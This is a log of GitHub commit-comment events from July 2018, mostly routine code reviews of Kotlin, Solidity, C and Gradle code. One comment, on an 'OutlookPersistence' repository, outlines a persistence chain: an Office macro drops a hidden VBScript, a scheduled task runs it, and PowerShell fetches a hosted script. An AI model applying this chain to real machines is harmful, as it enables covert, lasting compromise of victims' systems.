{"id":"7934411081","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634673,"position":119,"line":137,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/works/AuthorWorksFragment.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:54:04Z","updated_at":"2018-07-08T18:54:04Z","author_association":"OWNER","body":"Может покрешиться из-за `!!` - его вообще следует избегать везде, где возможно"}},"created_at":"2018-07-08T18:54:04Z"}
{"id":"7934411561","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634674,"position":33,"line":52,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/works/AuthorWorksPresenter.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:54:25Z","updated_at":"2018-07-08T18:54:25Z","author_association":"OWNER","body":"`sendToView {...}`"}},"created_at":"2018-07-08T18:54:25Z"}
{"id":"7934411737","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29634675,"position":null,"line":null,"path":null,"commit_id":"0ad86b27517a6c119af5628089b761daa1650b52","created_at":"2018-07-08T18:54:33Z","updated_at":"2018-07-08T18:54:33Z","author_association":"NONE","body":"https://github.com/thilong/GameGemPackages/commit/0ad86b27517a6c119af5628089b761daa1650b52#diff-56a4fa78c0636c6d045adea0fde7a02c"}},"created_at":"2018-07-08T18:54:33Z"}
{"id":"7934412804","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29634676,"position":null,"line":null,"path":null,"commit_id":"0ad86b27517a6c119af5628089b761daa1650b52","created_at":"2018-07-08T18:55:20Z","updated_at":"2018-07-08T18:55:20Z","author_association":"NONE","body":"gamegem_0.9.deb"}},"created_at":"2018-07-08T18:55:20Z"}
{"id":"7934413011","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634677,"position":14,"line":61,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/editions/AuthorEditionsPresenter.kt","commit_id":"98a33f7c86617e66c61c11b44d2f10e1974b1ba9","created_at":"2018-07-08T18:55:30Z","updated_at":"2018-07-08T18:55:30Z","author_association":"OWNER","body":"`sendToView {...}`"}},"created_at":"2018-07-08T18:55:30Z"}
{"id":"7934413505","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634678,"position":14,"line":60,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/editions/WorkEditionsPresenter.kt","commit_id":"98a33f7c86617e66c61c11b44d2f10e1974b1ba9","created_at":"2018-07-08T18:55:54Z","updated_at":"2018-07-08T18:55:54Z","author_association":"OWNER","body":"То ж самое"}},"created_at":"2018-07-08T18:55:54Z"}
{"id":"7934414424","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"enigma0x3/OutlookPersistence"},"payload":{"comment":{"id":29634679,"position":4,"line":4,"path":"README.md","commit_id":"d4512f00b8ccbc621ba1a0c873cd20186dc88cb9","created_at":"2018-07-08T18:56:35Z","updated_at":"2018-07-08T18:56:35Z","author_association":"NONE","body":"-This is code for a \"slow\" persistence method. It includes an Office macro that drops a vbsript into a hidden folder and then schedules a task to execute the vbscript. Once executed, the vbscript calls powershell and executes a hosted script that invokes calc.exe."}},"created_at":"2018-07-08T18:56:35Z"}
{"id":"7934415823","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29634682,"position":null,"line":null,"path":null,"commit_id":"113c5a962033008cfb3124d2ffe4fb9b79a0a765","created_at":"2018-07-08T18:57:39Z","updated_at":"2018-07-08T18:57:39Z","author_association":"NONE","body":"GameGemiOS_v1.5_2018.04.01_0223.deb"}},"created_at":"2018-07-08T18:57:39Z"}
{"id":"7934415970","type":"CommitCommentEvent","actor":{"login":"avoidwork"},"repo":{"name":"avoidwork/tiny-httptest"},"payload":{"comment":{"id":29634684,"position":null,"line":null,"path":null,"commit_id":"406607372142bdc0eaf031d80a683b52ef9e0eba","created_at":"2018-07-08T18:57:46Z","updated_at":"2018-07-08T18:57:46Z","author_association":"OWNER","body":"This was an incomplete change, see f97e061fc73ef0cc9521d02c5fc817c5ad696f83"}},"created_at":"2018-07-08T18:57:46Z"}
{"id":"7934417467","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634685,"position":56,"line":65,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/edition/content/EditionContentFragment.kt","commit_id":"68a1c74e511cac2a7961a1007c50c8637eaa16fd","created_at":"2018-07-08T18:58:53Z","updated_at":"2018-07-08T18:58:53Z","author_association":"OWNER","body":"Закомментированный код не нужен - плюс на самом деле `onSaveInstanceState` не нужен на самом деле нигде. Его работу выполняет аннотация @State. Кое-где этот метод появился, потому что однажды компилятор от Evernote сломался на сохранении и восстановлении какого-то поля, уже и не вспомню какого именно."}},"created_at":"2018-07-08T18:58:53Z"}
{"id":"7934419069","type":"CommitCommentEvent","actor":{"login":"abdulbasitkay"},"repo":{"name":"meetmuhd/FCCProjects"},"payload":{"comment":{"id":29634688,"position":null,"line":null,"path":null,"commit_id":"89d8759d2937a12b2f38159ab8b5fb46c6ffe36d","created_at":"2018-07-08T19:00:10Z","updated_at":"2018-07-08T19:00:10Z","author_association":"NONE","body":"nice work"}},"created_at":"2018-07-08T19:00:10Z"}
{"id":"7934420422","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634694,"position":49,"line":49,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/settings/SettingsActivity.kt","commit_id":"baf780d4c4596eb829e92be806a35ba08f15fa7e","created_at":"2018-07-08T19:00:56Z","updated_at":"2018-07-08T19:00:56Z","author_association":"OWNER","body":"Не думаю, что у нас это появится"}},"created_at":"2018-07-08T19:00:56Z"}
{"id":"7934421359","type":"CommitCommentEvent","actor":{"login":"astrada"},"repo":{"name":"astrada/ppx_bs_css"},"payload":{"comment":{"id":29634698,"position":null,"line":null,"path":null,"commit_id":"15c5c703af7fe504da3b3d16d39816af990018b3","created_at":"2018-07-08T19:01:36Z","updated_at":"2018-07-08T19:01:36Z","author_association":"OWNER","body":"Have you tried with `bsb -clean-world` before `bsb -make-world`? I've noticed that after compiling the ppx, you need to clean the target project, otherwise it won't be reapplied (probably the ppx output is cached)."}},"created_at":"2018-07-08T19:01:36Z"}
{"id":"7934421806","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29634699,"position":null,"line":null,"path":null,"commit_id":"1a753e5fc5c17a3f7ee9c1bb37ae77e7ce4d0a6a","created_at":"2018-07-08T19:01:56Z","updated_at":"2018-07-08T19:01:56Z","author_association":"MEMBER","body":"Hey @oehme, just for clarity, this is not introducing public API but refactoring `buildSrc` and it could definitely be refactored further.\r\n\r\nThat being said, I do like your suggestion for a public API."}},"created_at":"2018-07-08T19:01:56Z"}
{"id":"7934421888","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29634700,"position":2,"line":31,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-08T19:02:00Z","updated_at":"2018-07-08T19:02:00Z","author_association":"NONE","body":"Why restrict this to the owner? What would happen if anyone can use it?"}},"created_at":"2018-07-08T19:02:00Z"}
{"id":"7934422813","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634703,"position":71,"line":71,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/dialog/LanguageBottomSheetDialog.kt","commit_id":"baf780d4c4596eb829e92be806a35ba08f15fa7e","created_at":"2018-07-08T19:02:39Z","updated_at":"2018-07-08T19:02:39Z","author_association":"OWNER","body":"`callback?.onLanguageChanged(...)`"}},"created_at":"2018-07-08T19:02:39Z"}
{"id":"7934424273","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29634706,"position":18,"line":44,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-08T19:03:47Z","updated_at":"2018-07-08T19:03:47Z","author_association":"NONE","body":"I see what you're doing. You can further simply things by removing `remainingShare` from the log. It is obvious given the inputs to the function. \r\n\r\nConsider changing the name `owner` to `sender` to remind you that it's only for this one transaction. "}},"created_at":"2018-07-08T19:03:47Z"}
{"id":"7934425036","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634707,"position":26,"line":26,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/SliderAdapter.kt","commit_id":"b089f8ddacbe9a30128b103820b5fea26765cdaf","created_at":"2018-07-08T19:04:21Z","updated_at":"2018-07-08T19:04:21Z","author_association":"OWNER","body":"Крашебельно. Лучше `photoSlide?.size ?: 0`"}},"created_at":"2018-07-08T19:04:21Z"}
{"id":"7934425585","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29634708,"position":22,"line":51,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-08T19:04:47Z","updated_at":"2018-07-08T19:04:47Z","author_association":"NONE","body":"This extra activity adds to gas cost and mental noise I think. You can just use msg.sender throughout the function. "}},"created_at":"2018-07-08T19:04:47Z"}
{"id":"7934426236","type":"CommitCommentEvent","actor":{"login":"MonzVee"},"repo":{"name":"MonzVee/Tiso-Blackstar-Chat-App"},"payload":{"comment":{"id":29634711,"position":null,"line":null,"path":null,"commit_id":"527150305d9d5e746d135d01dc44e0134d5ca030","created_at":"2018-07-08T19:05:15Z","updated_at":"2018-07-08T19:05:15Z","author_association":"OWNER","body":"This is a basic chat application, using node.js, express.js and mongodb.\r\nStep 1 - download the file\r\nstep 2 - open localhost3000 on multiple browsers\r\nstep 3 - enjoy the chatting experience\r\n\r\nThe app is fully functional and serves its purpose as a chat application. I didn't have time to debug the app as I would have liked as I was on a strict deadline, and with this commit I noticed a problem did occur regarding my database and chat history functionality. The database functionality works when tested with postman, and when the address localhost3000/history is entered. \r\nHowever on my next commit, I will be sure to add a revised version of the chat app."}},"created_at":"2018-07-08T19:05:15Z"}
{"id":"7934426406","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634712,"position":23,"line":23,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/GallerySlider.kt","commit_id":"b089f8ddacbe9a30128b103820b5fea26765cdaf","created_at":"2018-07-08T19:05:23Z","updated_at":"2018-07-08T19:05:23Z","author_association":"OWNER","body":"Это константы - такое лучше выносить в `companion object` - он по-факту является статическим блоком."}},"created_at":"2018-07-08T19:05:23Z"}
{"id":"7934428034","type":"CommitCommentEvent","actor":{"login":"SSDCreates"},"repo":{"name":"SSDCreates/ssdevelops.net"},"payload":{"comment":{"id":29634714,"position":null,"line":null,"path":null,"commit_id":"6f4db9c571b3f00beb28c574fe2bfdf051fad54d","created_at":"2018-07-08T19:06:33Z","updated_at":"2018-07-08T19:06:33Z","author_association":"OWNER","body":"addedcname"}},"created_at":"2018-07-08T19:06:33Z"}
{"id":"7934428607","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29634717,"position":null,"line":null,"path":null,"commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-08T19:06:58Z","updated_at":"2018-07-08T19:06:58Z","author_association":"NONE","body":"I see the `owner` in the constructor is never actually used. (It pops up where I think `sender` would be more to the point.). \r\n\r\nTo keep pushing forward, consider adding an emergency stop switch that only the owner of the contract is allowed to use. Make it stop all deposits and withdrawals when the contract is stopped. "}},"created_at":"2018-07-08T19:06:58Z"}
{"id":"7934428733","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29634718,"position":null,"line":null,"path":null,"commit_id":"1a753e5fc5c17a3f7ee9c1bb37ae77e7ce4d0a6a","created_at":"2018-07-08T19:07:04Z","updated_at":"2018-07-08T19:07:04Z","author_association":"MEMBER","body":"Yeah I just assumed this was a draft for a potential public api addition. Thanks for considering :)"}},"created_at":"2018-07-08T19:07:04Z"}
{"id":"7934428927","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634720,"position":24,"line":24,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/CustomLinkMovementMethod.kt","commit_id":"3a145fd0259d058bbfc94b9be04dcd9553a9f387","created_at":"2018-07-08T19:07:14Z","updated_at":"2018-07-08T19:07:14Z","author_association":"OWNER","body":"Можно проще: `fun newInstance() = LinkMovementMethod()`"}},"created_at":"2018-07-08T19:07:14Z"}
{"id":"7934429265","type":"CommitCommentEvent","actor":{"login":"Tangol"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29634721,"position":null,"line":null,"path":null,"commit_id":"17a381658487f744de63575d282a08b85dc2ee19","created_at":"2018-07-08T19:07:30Z","updated_at":"2018-07-08T19:07:30Z","author_association":"NONE","body":"How would the 1 minute interval impact the server if you have, let's say 300 visitors online at the same time?\r\n300 online checks every minute would crash the database.\r\n\r\nRef my other report here https://github.com/villagedefrance/OpenCart-Overclocked/issues/189"}},"created_at":"2018-07-08T19:07:30Z"}
{"id":"7934430072","type":"CommitCommentEvent","actor":{"login":"jredrejo"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29634723,"position":null,"line":null,"path":null,"commit_id":"89dcd94d4468539675d1b3a6faf8dbb1382c3eea","created_at":"2018-07-08T19:08:07Z","updated_at":"2018-07-08T19:08:07Z","author_association":"CONTRIBUTOR","body":"@rtibbles  I have checked the frontend works correctly when that payload line is removed: i.e. PATCH is sending only the fields that are modified. I have adapted #3886 to use it when validating, so only the received fields are validated.\r\nI will check again if we get some performance improvement creating the update field for the serializers. If I see some gain I will do another PR for it, joining the backend change  plus the removal of this line."}},"created_at":"2018-07-08T19:08:07Z"}
{"id":"7934430620","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29634726,"position":null,"line":null,"path":null,"commit_id":"e6f78ae943c95dcff114b538bf318a688338c265","created_at":"2018-07-08T19:08:29Z","updated_at":"2018-07-08T19:08:29Z","author_association":"MEMBER","body":"No the flag wasn't supposed to be added."}},"created_at":"2018-07-08T19:08:29Z"}
{"id":"7934430884","type":"CommitCommentEvent","actor":{"login":"stefanheyder"},"repo":{"name":"ILSCeV/Lara"},"payload":{"comment":{"id":29634727,"position":null,"line":null,"path":null,"commit_id":"dcc23d8ad6a4db055f4ce5aa21e2dbc5a3ae0ecc","created_at":"2018-07-08T19:08:42Z","updated_at":"2018-07-08T19:08:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Survey: deleting someone from survey with CL rights throws an error](https://trello.com/c/EoVV3vVN/489-2-survey-deleting-someone-from-survey-with-cl-rights-throws-an-error)"}},"created_at":"2018-07-08T19:08:42Z"}
{"id":"7934431716","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634730,"position":28,"line":72,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/FontTextView.kt","commit_id":"3a145fd0259d058bbfc94b9be04dcd9553a9f387","created_at":"2018-07-08T19:09:19Z","updated_at":"2018-07-08T19:09:19Z","author_association":"OWNER","body":"`this.` можно вообще не указывать - все действия итак применяются к вызываемому объекту"}},"created_at":"2018-07-08T19:09:19Z"}
{"id":"7934432834","type":"CommitCommentEvent","actor":{"login":"ykupyak"},"repo":{"name":"nastysia/ConsoleApplicationHomework"},"payload":{"comment":{"id":29634731,"position":12,"line":29,"path":"ConsoleApplicationHomework/Task/Task17.swift","commit_id":"25d19e358557bf3d53114ac3e0edc92bf4d33a5a","created_at":"2018-07-08T19:10:04Z","updated_at":"2018-07-08T19:10:04Z","author_association":"NONE","body":"Незважаючи на те, що swift дозволяє ділити на Double 0.0, все рівно, гарніше буде поділити коли точно не на нуль. "}},"created_at":"2018-07-08T19:10:04Z"}
{"id":"7934433498","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634733,"position":6,"line":48,"path":"app/src/main/kotlin/ru/fantlab/android/data/dao/model/Edition.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:10:31Z","updated_at":"2018-07-08T19:10:31Z","author_association":"OWNER","body":"Проще: `override fun toString() = name`"}},"created_at":"2018-07-08T19:10:31Z"}
{"id":"7934433725","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634734,"position":6,"line":43,"path":"app/src/main/kotlin/ru/fantlab/android/data/dao/model/Work.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:10:40Z","updated_at":"2018-07-08T19:10:40Z","author_association":"OWNER","body":"Аналогично"}},"created_at":"2018-07-08T19:10:40Z"}
{"id":"7934434085","type":"CommitCommentEvent","actor":{"login":"ykupyak"},"repo":{"name":"nastysia/ConsoleApplicationHomework"},"payload":{"comment":{"id":29634735,"position":5,"line":22,"path":"ConsoleApplicationHomework/Task/Task17.swift","commit_id":"25d19e358557bf3d53114ac3e0edc92bf4d33a5a","created_at":"2018-07-08T19:10:58Z","updated_at":"2018-07-08T19:10:58Z","author_association":"NONE","body":"Спробуй уникнути дублювання коду a == 0"}},"created_at":"2018-07-08T19:10:58Z"}
{"id":"7934434859","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29634737,"position":null,"line":null,"path":null,"commit_id":"1a753e5fc5c17a3f7ee9c1bb37ae77e7ce4d0a6a","created_at":"2018-07-08T19:11:32Z","updated_at":"2018-07-08T19:11:32Z","author_association":"MEMBER","body":"Your assumption makes a lot of sense since I chose to add it to `kotlin-dsl-upstream` :) I'll replace it by your suggestion."}},"created_at":"2018-07-08T19:11:32Z"}
{"id":"7934434865","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"astrada/ppx_bs_css"},"payload":{"comment":{"id":29634738,"position":null,"line":null,"path":null,"commit_id":"15c5c703af7fe504da3b3d16d39816af990018b3","created_at":"2018-07-08T19:11:32Z","updated_at":"2018-07-08T19:11:32Z","author_association":"NONE","body":"I tried that many times as well as re-install this ppx and it doesn't help "}},"created_at":"2018-07-08T19:11:32Z"}
{"id":"7934437736","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634744,"position":43,"line":200,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/edition/overview/EditionOverviewFragment.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:13:37Z","updated_at":"2018-07-08T19:13:37Z","author_association":"OWNER","body":"Довольно странно выглядит - оверрайд с дженериками. Но даже если так, `item as Edition.Author` отдельной строкой выглядит тоже странно - лучше его засунуть вместо первого `item`, например - дальше сработает автокаст."}},"created_at":"2018-07-08T19:13:37Z"}
{"id":"7934438521","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634745,"position":25,"line":65,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:14:14Z","updated_at":"2018-07-08T19:14:14Z","author_association":"OWNER","body":"Вжух, и StringBuilder нужен здесь :)"}},"created_at":"2018-07-08T19:14:14Z"}
{"id":"7934438569","type":"CommitCommentEvent","actor":{"login":"guysoft"},"repo":{"name":"mtytel/helm"},"payload":{"comment":{"id":29634746,"position":null,"line":null,"path":null,"commit_id":"0454059b9508dc81815048d5ce402e996f09f9fc","created_at":"2018-07-08T19:14:16Z","updated_at":"2018-07-08T19:14:16Z","author_association":"NONE","body":"This commit broke the build for us at Zynthian."}},"created_at":"2018-07-08T19:14:16Z"}
{"id":"7934439074","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634747,"position":38,"line":106,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:14:37Z","updated_at":"2018-07-08T19:14:37Z","author_association":"OWNER","body":"Потенциально крашебельно"}},"created_at":"2018-07-08T19:14:37Z"}
{"id":"7934439381","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634748,"position":45,"line":113,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:14:50Z","updated_at":"2018-07-08T19:14:50Z","author_association":"OWNER","body":"То ж самое, что и выше"}},"created_at":"2018-07-08T19:14:50Z"}
{"id":"7934439676","type":"CommitCommentEvent","actor":{"login":"samer054"},"repo":{"name":"samer054/brest"},"payload":{"comment":{"id":29634752,"position":null,"line":null,"path":null,"commit_id":"90729e8a44d398db18d6f606cea684f6d37ad7bf","created_at":"2018-07-08T19:15:04Z","updated_at":"2018-07-08T19:15:04Z","author_association":"OWNER","body":"Resturant app"}},"created_at":"2018-07-08T19:15:04Z"}
{"id":"7934439724","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634753,"position":14,"line":42,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewPresenter.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:15:06Z","updated_at":"2018-07-08T19:15:06Z","author_association":"OWNER","body":"`sendToView {...}`"}},"created_at":"2018-07-08T19:15:06Z"}
{"id":"7934440424","type":"CommitCommentEvent","actor":{"login":"janusund"},"repo":{"name":"janusund/algorithms"},"payload":{"comment":{"id":29634756,"position":null,"line":null,"path":null,"commit_id":"15eb585ff737b4f7e260addb438e0d7822316eca","created_at":"2018-07-08T19:15:32Z","updated_at":"2018-07-08T19:15:32Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-08T19:15:32Z"}
{"id":"7934441883","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634757,"position":28,"line":28,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/dialog/ListDialogView.kt","commit_id":"9288498b258b01e8dd89eb69b26ecfd642e750ac","created_at":"2018-07-08T19:16:32Z","updated_at":"2018-07-08T19:16:32Z","author_association":"OWNER","body":"Интерфейсы, внутренние классы, всякую статику лучше переносить в самый низ - там самое место"}},"created_at":"2018-07-08T19:16:32Z"}
{"id":"7934442972","type":"CommitCommentEvent","actor":{"login":"DEF7"},"repo":{"name":"reagent/http"},"payload":{"comment":{"id":29634758,"position":59,"line":59,"path":"src/connect.c","commit_id":"a4e8ca1770d6e06e40978c587273b70224cfd7c9","created_at":"2018-07-08T19:17:19Z","updated_at":"2018-07-08T19:17:19Z","author_association":"NONE","body":"Shouldn't this send call be moving the pointer along the request buffer by total_bytes_sent? Otherwise it keeps sending the same beginning of the request over and over, if the send calls are for some reason not sending the whole request on the first call. The code is setup to keep track of whether or not it has sent the whole request, but it's not actually sending the request out in sequential chunks because it's only ever sending from the beginning of the request buffer.\r\n\r\ni.e. \r\n\r\n` bytes_sent = send(sockfd, &request[total_bytes_sent], strlen(&request[total_bytes_sent]), 0);`"}},"created_at":"2018-07-08T19:17:19Z"}
{"id":"7934443795","type":"CommitCommentEvent","actor":{"login":"darkyuhooxxx"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29634759,"position":7,"line":76,"path":"docs/configs.md","commit_id":"2a732728012a35933cff6aa86acc892009f8688a","created_at":"2018-07-08T19:17:56Z","updated_at":"2018-07-08T19:17:56Z","author_association":"NONE","body":"2a73272"}},"created_at":"2018-07-08T19:17:56Z"}
{"id":"7934445329","type":"CommitCommentEvent","actor":{"login":"karimalisaber"},"repo":{"name":"karimalisaber/coursera-test"},"payload":{"comment":{"id":29634760,"position":null,"line":null,"path":null,"commit_id":"98ef722a3745d68bc33d307169b74c3998153a8a","created_at":"2018-07-08T19:18:57Z","updated_at":"2018-07-08T19:18:57Z","author_association":"OWNER","body":"I can't use it\r\n"}},"created_at":"2018-07-08T19:18:57Z"}
{"id":"7934445490","type":"CommitCommentEvent","actor":{"login":"maxwellhadley"},"repo":{"name":"skerit/node-rfxcom"},"payload":{"comment":{"id":29634761,"position":null,"line":null,"path":null,"commit_id":"9cd637f9e8ba70ca710902f2c5c930566ed893fe","created_at":"2018-07-08T19:19:03Z","updated_at":"2018-07-08T19:19:03Z","author_association":"NONE","body":"Latest version 1.4.0 rfxcom/node-rfxcom uses serialport >=6.2.0. Updates were needed to accommodate the serialport API changes"}},"created_at":"2018-07-08T19:19:03Z"}
{"id":"7934445643","type":"CommitCommentEvent","actor":{"login":"hugsy"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":29634762,"position":5,"line":4475,"path":"gef.py","commit_id":"59143c94b3afbfe9a01c6f4b9c445f4b806f475e","created_at":"2018-07-08T19:19:11Z","updated_at":"2018-07-08T19:19:11Z","author_association":"OWNER","body":"`address` would be more understandable than `new_fd` here."}},"created_at":"2018-07-08T19:19:11Z"}
{"id":"7934446832","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29634763,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-08T19:20:05Z","updated_at":"2018-07-08T19:20:05Z","author_association":"CONTRIBUTOR","body":"Cómo se ponen imágenes? Tengo prueba de que está pasando exactamente lo contrario en mi juego. Incluso el reporte de traducción dice:\r\nFound no Verse.ThingDef named Plant_Berry to match Plant_Berry.label (Plants_Wild_Temperate.xml)\r\nFound no Verse.ThingDef named Plant_Berry to match Plant_Berry.description (Plants_Wild_Temperate.xml)"}},"created_at":"2018-07-08T19:20:05Z"}
{"id":"7934447142","type":"CommitCommentEvent","actor":{"login":"Vynel"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29634764,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-08T19:20:15Z","updated_at":"2018-07-08T19:20:15Z","author_association":"NONE","body":"woorkeeed !!! excelent report"}},"created_at":"2018-07-08T19:20:15Z"}
{"id":"7934447856","type":"CommitCommentEvent","actor":{"login":"maxwellhadley"},"repo":{"name":"jpbalivet/node-rfxcom"},"payload":{"comment":{"id":29634765,"position":null,"line":null,"path":null,"commit_id":"a8ba990a403910ba3447a551b92a9afa8f96e38a","created_at":"2018-07-08T19:20:44Z","updated_at":"2018-07-08T19:20:44Z","author_association":"NONE","body":"Latest version 1.4.0 rfxcom/node-rfxcom uses serialport >=6.2.0. Updates were needed to accommodate the serialport API changes\r\n\r\nThe missing file error is not important, it is just a helper script in the wrong place. I'll put it on the list..."}},"created_at":"2018-07-08T19:20:44Z"}
{"id":"7934448192","type":"CommitCommentEvent","actor":{"login":"maxwellhadley"},"repo":{"name":"SebiErnst/node-rfxcom"},"payload":{"comment":{"id":29634766,"position":null,"line":null,"path":null,"commit_id":"ca6c8159a42d8d457e78d2b01650bd5cdccd1ab2","created_at":"2018-07-08T19:20:58Z","updated_at":"2018-07-08T19:20:58Z","author_association":"NONE","body":"Latest version 1.4.0 rfxcom/node-rfxcom uses serialport >=6.2.0. Updates were needed to accommodate the serialport API changes"}},"created_at":"2018-07-08T19:20:58Z"}
{"id":"7934448335","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29634767,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-08T19:21:05Z","updated_at":"2018-07-08T19:21:05Z","author_association":"CONTRIBUTOR","body":"Bug?\r\nAlguien más puede probarlo en su computadora?"}},"created_at":"2018-07-08T19:21:05Z"}
